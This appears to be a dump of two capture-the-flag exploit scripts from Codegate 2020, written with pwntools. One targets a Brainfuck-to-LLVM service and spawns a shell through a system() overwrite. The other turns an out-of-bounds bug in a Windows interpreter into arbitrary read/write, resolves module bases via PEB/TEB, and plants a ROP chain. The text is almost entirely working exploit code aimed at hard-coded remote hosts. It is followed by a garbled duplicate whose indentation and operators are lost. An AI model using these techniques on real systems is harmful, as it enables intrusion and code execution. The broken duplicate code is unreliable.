ujin5/babyllvm.py

## babyllvm.py
from pwn import *

#s = remote("0", 1234)

s = remote("58.229.240.181", 7777)
context.log_level = "debug"
s.recvuntil(">>>")
s.sendline("+[[."+"<"*0x8+"[.>]"+"<"*(0x6e+0x8)+"[.>]"+">"*(0x10-0x6)+"[,>]"+"<"*(0x6+0x10)+"[,>]"+">"*(0x80-0xe)+",>,<.]]")
base = u64(s.recvuntil("\x7f")[-6:]+"\x00\x00") - 0x201090
print "BASE @ " + hex(base)
libc = u64(s.recvuntil("\x7f")[-6:]+"\x00\x00") - 0x0000000000110140 #- 0x18eef0
print "libc @ " + hex(libc)
system = libc + 0x4f440
alloc = base + 0x0000927
s.send(p64(system)[:6])
s.send(p64(alloc)[:6])
s.send("sh")
'''
ret = libc + 0x1101a9
raw_input()
s.send(p64(libc+0x4f322))
'''
s.interactive()

## winterpreter.py
from pwn import *

#s = remote("14.47.79.136", 54321)
#context.log_level = 'debug'
s = remote("183.107.102.15",54321)
#s = remote("52.78.198.47",54321)
code = []
code.append("v>>>>>>>>>>&##s")
code.append(">&|>>>>>>>>>^")
code.append(">&>&&&p&>>>&|")
code.append("<<<<<<.g&&<<v")
code.append("<<<<<<<<<<|&<")
code.append("<<<<<<p&&&<<v")
code.append("FAKE"*20)
s.sendline("80")
s.sendline(str(len(code)))
for line in code:
	print line
	s.sendline(line)
# BuG Trigger
s.recvuntil(">")
s.sendline("run")
s.recvuntil(">")
s.sendline("cycle 100")
s.sendline("1 115")
s.recvuntil(">")
s.sendline("run")
s.recvuntil(">")
s.sendline("cycle 100")
s.sendline("0 62 12 0 255 1")

def oob_read_u8(x,y):
	s.recvuntil(">")
	s.sendline("run")
	s.recvuntil(">")
	s.sendline("step 100")
	s.sendline("0 62 12 0 255 0 1 %d %d"%(x,y))
	r = int(s.recvuntil("executed.").split(" ")[1], 10)
	return p8(r)
def oob_read_u64(x,y):
	leak = ""
	for i in range(0,8):
		leak += oob_read_u8(x+i,y)
	leak = u64(leak)
	return leak
def oob_write_u8(x,y,val):
	s.recvuntil(">")
	s.sendline("run")
	s.recvuntil(">")
	s.sendline("step 100")
	s.sendline("0 62 12 0 255 0 0 %d %d %d"%(val,x,y))
def oob_write_u64(x,y,val):
	val = p64(val)
	for c in val:
		oob_write_u8(x,y,u8(c))
		x += 1
def arb_read(addr):
	oob_write_u64(0x20,0x5,addr)
	return oob_read_u64(0x0,0x6)
def arb_read_u16(addr):
	oob_write_u64(0x20,0x5,addr)
	low = u8(oob_read_u8(0x0,0x6))
	oob_write_u64(0x20,0x5,addr+1)
	hi = u8(oob_read_u8(0x0,0x6))
	return low | (hi<<8)
def arb_write(addr,val):
	oob_write_u64(0x20,0x5,addr)
	return oob_write_u64(0x0,0x6,val)
def hexdump(addr, size = 0x10):
	print "-"*5+"hexdump"+"-"*5
	for i in range(0,size):
		r = arb_read(addr + 0x8*i)
		print hex(r)
oob_write_u8(0x30,0,0xff)
oob_write_u8(0x30,1,0xff)
oob_write_u8(0x30,2,0xff)
oob_write_u8(0x30,3,0xff)
oob_write_u8(0x30,4,0xff)
leak = oob_read_u64(0x20,5)
print "HEAP @ "+hex(leak)
oob_write_u64(0x20,5,0x414141414141)
oob_write_u64(0x30,5,0x10000)
oob_write_u64(0x38,5,0x10000)
#hexdump(leak, 0x15)
VCRUNTIME140 = arb_read(leak+13*8) - 0xe000
print "VCRUNTIME140 @ "+hex(VCRUNTIME140)
KERNEL32 = arb_read(VCRUNTIME140+0xe008) - 0x001cd20
print "KERNEL32 @ "+hex(KERNEL32)
NTDLL = arb_read(KERNEL32+0x07AB00)  - 0x0d010#RtlAllocateHeap
print "NTDLL @ " + hex(NTDLL)
PebLdr = (NTDLL+0x1653C0)
print "PebLdr @ " + hex(PebLdr)
binBase = arb_read(arb_read(PebLdr+0x20)+0x20)
print "binBase @ "+hex(binBase)
ucrtbase = arb_read(binBase + 0x00A2B8) - 0x0c7b0
print "ucrtbase @ "+hex(ucrtbase)
PEB = arb_read(PebLdr - 0x98) - 0x80
print "PEB @ "+hex(PEB)
TEB = PEB + 0x1000
print "TEB @ "+hex(TEB)
stackAddr = arb_read(TEB + 0x10)
print "stack Address @ "+hex(stackAddr)
stackEnd = stackAddr + (0x10000 - (stackAddr & 0xffff)) - 0x8
returnAddr = binBase + 0x00007fad
print hex(returnAddr)
retPtr = stackAddr + 0x4808
here = -1
for i in range(0, 0x1000/0x10):
	temp = arb_read_u16(retPtr + i*0x10)
	if temp == (returnAddr&0xffff):
		here = i
		break
print("boooom : "+hex(0x4808+here*0x10))

arb_write(retPtr + here*0x10, 0x4141414141)
gadget1 = NTDLL + 0x9217b #: pop rcx ; ret
gadget2 = NTDLL + 0x057642 #: pop rdx ; ret
gadget3 = NTDLL + 0x08fb31 # pop rcx ; pop r8 ; pop r9 ; pop r10 ; pop r11 ; ret
gadget4 = NTDLL + 0x02a3b # add rsp, 0x38 ; ret
pivot = NTDLL + 0x10bba5 # add rsp, 0x508 ; ret#+ 0x6e48c # add rsp, 0x240 ; pop rdi ; ret
_open = ucrtbase + 0x000a2a30
_read = ucrtbase + 0x0016270
_puts = ucrtbase + 0x0080760
bss = binBase + 0xf000
cmd = "flag.txt\x00"
i = 0
for c in cmd:
	arb_write(bss+ i, ord(c))
	i += 1

rop_chain = [
	gadget2,
	0x0,
	gadget3,
	bss,
	0x40,
	0,
	0,
	0,
	gadget1+1,
	_open,
	gadget4, 0, 0, 0, 0, 0, 0, 0,
	gadget2,
	bss+0x10,
	gadget3,
	0x3,
	0x100,
	0,
	0,
	0,
	_read,
	gadget4, 0, 0, 0, 0, 0, 0, 0,
	gadget1,
	bss+0x10,
	_puts
]
arb_write(retPtr + here*0x10, pivot)
retPtr = retPtr + here*0x10 + 0x508 +  0x8
for i, c in enumerate(rop_chain):
	arb_write(retPtr + i*0x8, c)
s.sendline("quit")
#CODEGATE2020{pwn1ng_da7_d3bugger_w17h_an0th3r_d1m3nsi0n}
s.interactive()
	from pwn import *

	#s = remote("0", 1234)

	s = remote("58.229.240.181", 7777)
	context.log_level = "debug"
	s.recvuntil(">>>")
	s.sendline("+[[."+"<"0x8+"[.>]"+"<"(0x6e+0x8)+"[.>]"+">"(0x10-0x6)+"[,>]"+"<"(0x6+0x10)+"[,>]"+">"*(0x80-0xe)+",>,<.]]")
	base = u64(s.recvuntil("\x7f")[-6:]+"\x00\x00") - 0x201090
	print "BASE @ " + hex(base)
	libc = u64(s.recvuntil("\x7f")[-6:]+"\x00\x00") - 0x0000000000110140 #- 0x18eef0
	print "libc @ " + hex(libc)
	system = libc + 0x4f440
	alloc = base + 0x0000927
	s.send(p64(system)[:6])
	s.send(p64(alloc)[:6])
	s.send("sh")
	'''
	ret = libc + 0x1101a9
	raw_input()
	s.send(p64(libc+0x4f322))
	'''
	s.interactive()
	from pwn import *

	#s = remote("14.47.79.136", 54321)
	#context.log_level = 'debug'
	s = remote("183.107.102.15",54321)
	#s = remote("52.78.198.47",54321)
	code = []
	code.append("v>>>>>>>>>>&##s")
	code.append(">&\|>>>>>>>>>^")
	code.append(">&>&&&p&>>>&\|")
	code.append("<<<<<<.g&&<<v")
	code.append("<<<<<<<<<<\|&<")
	code.append("<<<<<<p&&&<<v")
	code.append("FAKE"*20)
	s.sendline("80")
	s.sendline(str(len(code)))
	for line in code:
	print line
	s.sendline(line)
	# BuG Trigger
	s.recvuntil(">")
	s.sendline("run")
	s.recvuntil(">")
	s.sendline("cycle 100")
	s.sendline("1 115")
	s.recvuntil(">")
	s.sendline("run")
	s.recvuntil(">")
	s.sendline("cycle 100")
	s.sendline("0 62 12 0 255 1")

	def oob_read_u8(x,y):
	s.recvuntil(">")
	s.sendline("run")
	s.recvuntil(">")
	s.sendline("step 100")
	s.sendline("0 62 12 0 255 0 1 %d %d"%(x,y))
	r = int(s.recvuntil("executed.").split(" ")[1], 10)
	return p8(r)
	def oob_read_u64(x,y):
	leak = ""
	for i in range(0,8):
	leak += oob_read_u8(x+i,y)
	leak = u64(leak)
	return leak
	def oob_write_u8(x,y,val):
	s.recvuntil(">")
	s.sendline("run")
	s.recvuntil(">")
	s.sendline("step 100")
	s.sendline("0 62 12 0 255 0 0 %d %d %d"%(val,x,y))
	def oob_write_u64(x,y,val):
	val = p64(val)
	for c in val:
	oob_write_u8(x,y,u8(c))
	x += 1
	def arb_read(addr):
	oob_write_u64(0x20,0x5,addr)
	return oob_read_u64(0x0,0x6)
	def arb_read_u16(addr):
	oob_write_u64(0x20,0x5,addr)
	low = u8(oob_read_u8(0x0,0x6))
	oob_write_u64(0x20,0x5,addr+1)
	hi = u8(oob_read_u8(0x0,0x6))
	return low \| (hi<<8)
	def arb_write(addr,val):
	oob_write_u64(0x20,0x5,addr)
	return oob_write_u64(0x0,0x6,val)
	def hexdump(addr, size = 0x10):
	print "-"5+"hexdump"+"-"5
	for i in range(0,size):
	r = arb_read(addr + 0x8*i)
	print hex(r)
	oob_write_u8(0x30,0,0xff)
	oob_write_u8(0x30,1,0xff)
	oob_write_u8(0x30,2,0xff)
	oob_write_u8(0x30,3,0xff)
	oob_write_u8(0x30,4,0xff)
	leak = oob_read_u64(0x20,5)
	print "HEAP @ "+hex(leak)
	oob_write_u64(0x20,5,0x414141414141)
	oob_write_u64(0x30,5,0x10000)
	oob_write_u64(0x38,5,0x10000)
	#hexdump(leak, 0x15)
	VCRUNTIME140 = arb_read(leak+13*8) - 0xe000
	print "VCRUNTIME140 @ "+hex(VCRUNTIME140)
	KERNEL32 = arb_read(VCRUNTIME140+0xe008) - 0x001cd20
	print "KERNEL32 @ "+hex(KERNEL32)
	NTDLL = arb_read(KERNEL32+0x07AB00) - 0x0d010#RtlAllocateHeap
	print "NTDLL @ " + hex(NTDLL)
	PebLdr = (NTDLL+0x1653C0)
	print "PebLdr @ " + hex(PebLdr)
	binBase = arb_read(arb_read(PebLdr+0x20)+0x20)
	print "binBase @ "+hex(binBase)
	ucrtbase = arb_read(binBase + 0x00A2B8) - 0x0c7b0
	print "ucrtbase @ "+hex(ucrtbase)
	PEB = arb_read(PebLdr - 0x98) - 0x80
	print "PEB @ "+hex(PEB)
	TEB = PEB + 0x1000
	print "TEB @ "+hex(TEB)
	stackAddr = arb_read(TEB + 0x10)
	print "stack Address @ "+hex(stackAddr)
	stackEnd = stackAddr + (0x10000 - (stackAddr & 0xffff)) - 0x8
	returnAddr = binBase + 0x00007fad
	print hex(returnAddr)
	retPtr = stackAddr + 0x4808
	here = -1
	for i in range(0, 0x1000/0x10):
	temp = arb_read_u16(retPtr + i*0x10)
	if temp == (returnAddr&0xffff):
	here = i
	break
	print("boooom : "+hex(0x4808+here*0x10))

	arb_write(retPtr + here*0x10, 0x4141414141)
	gadget1 = NTDLL + 0x9217b #: pop rcx ; ret
	gadget2 = NTDLL + 0x057642 #: pop rdx ; ret
	gadget3 = NTDLL + 0x08fb31 # pop rcx ; pop r8 ; pop r9 ; pop r10 ; pop r11 ; ret
	gadget4 = NTDLL + 0x02a3b # add rsp, 0x38 ; ret
	pivot = NTDLL + 0x10bba5 # add rsp, 0x508 ; ret#+ 0x6e48c # add rsp, 0x240 ; pop rdi ; ret
	_open = ucrtbase + 0x000a2a30
	_read = ucrtbase + 0x0016270
	_puts = ucrtbase + 0x0080760
	bss = binBase + 0xf000
	cmd = "flag.txt\x00"
	i = 0
	for c in cmd:
	arb_write(bss+ i, ord(c))
	i += 1

	rop_chain = [
	gadget2,
	0x0,
	gadget3,
	bss,
	0x40,
	0,
	0,
	0,
	gadget1+1,
	_open,
	gadget4, 0, 0, 0, 0, 0, 0, 0,
	gadget2,
	bss+0x10,
	gadget3,
	0x3,
	0x100,
	0,
	0,
	0,
	_read,
	gadget4, 0, 0, 0, 0, 0, 0, 0,
	gadget1,
	bss+0x10,
	_puts
	]
	arb_write(retPtr + here*0x10, pivot)
	retPtr = retPtr + here*0x10 + 0x508 + 0x8
	for i, c in enumerate(rop_chain):
	arb_write(retPtr + i*0x8, c)
	s.sendline("quit")
	#CODEGATE2020{pwn1ng_da7_d3bugger_w17h_an0th3r_d1m3nsi0n}
	s.interactive()